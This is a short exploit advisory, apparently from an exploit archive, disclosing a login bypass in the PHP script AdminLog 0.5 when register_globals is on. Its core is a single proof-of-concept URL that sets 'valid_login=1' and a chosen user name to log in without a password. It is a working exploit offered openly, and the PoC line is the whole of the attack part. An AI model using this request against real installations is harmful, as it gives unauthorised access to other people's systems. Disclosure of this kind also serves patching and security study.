id: 5452
date: 07/01/2009
title: AdminLog 0.5 (valid_login) Authentication Bypass Vulnerability
author: SirGod
cves: 

==============================================================
AdminLog 0.5 (valid_login) Authentication Bypass Vulnerability
==============================================================


#########################################################################
[+] AdminLog 0.5 Login Bypass Vulnerability
[+] Discovered By SirGod
[+] down: http://www.manlyfamily.net/wiki/doku.php?id=programming:php:adminlog
#########################################################################

[+] Login Bypass

 - Conditions : register_globals = ON

 - PoC

      http://127.0.0.1/[path]/adminlog.php?valid_login=1&loggedInUser=[VALIDUSER]

#########################################################################


#  0day.today [2023-03-21]  #